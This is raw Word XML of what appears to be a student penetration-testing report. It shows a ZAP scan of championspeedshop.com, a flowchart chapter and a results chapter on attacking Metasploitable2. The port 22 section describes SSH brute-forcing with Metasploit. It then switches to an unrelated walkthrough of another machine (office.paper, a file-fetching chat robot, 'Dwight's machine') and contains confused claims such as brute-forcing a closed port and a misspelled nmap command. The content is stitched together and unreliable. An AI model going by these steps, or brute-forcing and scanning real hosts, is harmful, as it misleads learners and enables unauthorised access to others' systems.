                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69785110" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zap Scan Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CABDF6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used: OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E65677" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target: championspeedshop.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8FF3BC" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8671B4" w14:textId="4FC05E81" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344BF2F0" wp14:editId="5E35C481">
            <wp:extent cx="5937250" cy="3276600"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="19050"/>
            <wp:docPr id="6025035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276600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4CA46" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="3F90CF00" w14:textId="0A991064" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3A55F" wp14:editId="4761B63D">
            <wp:extent cx="5956300" cy="2286000"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="19050"/>
            <wp:docPr id="1589320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6300" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161F83C" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="167CE958" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="51109CC0" w14:textId="2F00AD2C" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66DC1297" wp14:editId="51AE83BC">
            <wp:extent cx="5734050" cy="2876550"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="526616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w="9525" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A4C0B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="3CDA6284" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A778D5" w:rsidSect="00336E0D">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="94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5E7832DB" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580EA5E8" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FF9F4E" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FLOWCHART</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F4E00" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B"/>
    <w:p w14:paraId="1DB02799" w14:textId="0623AF76" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7212D8A8" wp14:editId="765A6D65">
            <wp:extent cx="4831715" cy="4741545"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="20955"/>
            <wp:docPr id="313029190" name="Picture 33" descr="Vulnerability Assessment and Penetration Testing Company India | iSecurion  Technology and Consulting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lnerability Assessment and Penetration Testing Company India | iSecurion  Technology and Consulting Pvt. Lt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31715" cy="4741545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EBEB02" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B"/>
    <w:p w14:paraId="3AA357B6" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B"/>
    <w:p w14:paraId="7A21F2EE" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358F6475" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583D859D" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEE6523" w14:textId="380E9C02" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AAE37A" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RESULTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5B195" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADAA168" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable2 Port Vulnerability Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206EEB6C" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Port 22:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A6380" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D81A76" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using brute force we will be able to try and get our way into port 22 since it is a closed port. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C0F76" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>By searching ‘SSH’, Metasploit returns 71 potential exploits. One of which is the ssh_login auxiliary, which in this case will be used to load a few scripts to hopefully login using some default credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69FF9B" w14:textId="009C74DF" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ja-JP" w:bidi="ta-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43654E58" wp14:editId="47D63AD9">
            <wp:extent cx="4820285" cy="248285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6622190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0285" cy="248285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F99B4" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This command returns all the variables that need to be completed before running an exploit. This is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>same across any exploit that is loaded via Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6838514D" w14:textId="3B0248FE" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ja-JP" w:bidi="ta-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207B6FEB" wp14:editId="2B962B27">
            <wp:extent cx="5734685" cy="1422400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1622558831" name="Picture 26" descr="https://miro.medium.com/v2/resize:fit:700/0*p4D1vr3I-CUAkQ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0*p4D1vr3I-CUAkQ5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685" cy="1422400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393D8AE" w14:textId="73B576A3" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ja-JP" w:bidi="ta-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A815E11" wp14:editId="0FD183AE">
            <wp:extent cx="5734685" cy="1614170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="151244505" name="Picture 25" descr="https://miro.medium.com/v2/resize:fit:700/0*XBsu0NCbD3ymkB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700/0*XBsu0NCbD3ymkB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685" cy="1614170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC5FA7" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Even though we have the necessary variables to execute a brute force attack, we will fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E7EB5" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 2: Snooping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EFB4F4" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Having navigated to the hidden page, it’s easy to see that there is a ‘secret registration URL’ for internal employees at office.paper. So, we go ahead and try to navigate to this via the URL. It doesn’t work. The page tells us that the host is not trusted, so at this point, we remember that we need to give host privileges to the domain that we’re trying to access — demonstrated below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFDCE42" w14:textId="7684A80F" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ja-JP" w:bidi="ta-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100287E6" wp14:editId="7C8ADE72">
            <wp:extent cx="3680460" cy="248285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1299243503" name="Picture 24" descr="https://miro.medium.com/v2/resize:fit:387/0*SHUVsFO--Pii9D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387/0*SHUVsFO--Pii9D8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0460" cy="248285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE76BE" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We’re now inside the internal office chat, which allows us to see all internal employee conversations, as well as the ability to interact with the chat robot. In this context, the chat robot allows employees to request files related to the employee’s computer. So, by interacting with the chat robot, we can request files simply by typing ‘chat robot get file X’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E3CC7" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53EE6B65" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 3: Executing SSH Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9AD801" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Having now gathered the credentials to login via SSH, we can go ahead and execute the hack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5DA828" w14:textId="2306C5B3" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ja-JP" w:bidi="ta-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C242E3D" wp14:editId="4837E2DB">
            <wp:extent cx="5396230" cy="1230630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1223694628" name="Picture 23" descr="https://miro.medium.com/v2/resize:fit:567/0*AF7X0M7-ZOZPVm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567/0*AF7X0M7-ZOZPVmt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1230630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308E1DF" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As demonstrated by the image, we’re now inside Dwight’s machine. At this point, we’re able to list all current non-hidden files by the user simply by using the ‘ls’ command. This essentially allows us to view files that we shouldn’t be able to as an external.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CDEB98" w14:textId="37473B78" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ja-JP" w:bidi="ta-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="230EB008" wp14:editId="5F00A859">
            <wp:extent cx="5734685" cy="643255"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="615788711" name="Picture 22" descr="https://miro.medium.com/v2/resize:fit:635/0*ro1DVhudr74N1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635/0*ro1DVhudr74N1v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643255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D42047" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E71995" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Port 80 Attacking Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD6883" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step1: Do an nmap scan on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572F14F9" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt; db_namp -sV &lt;ipaddress&gt; -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444474D1" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
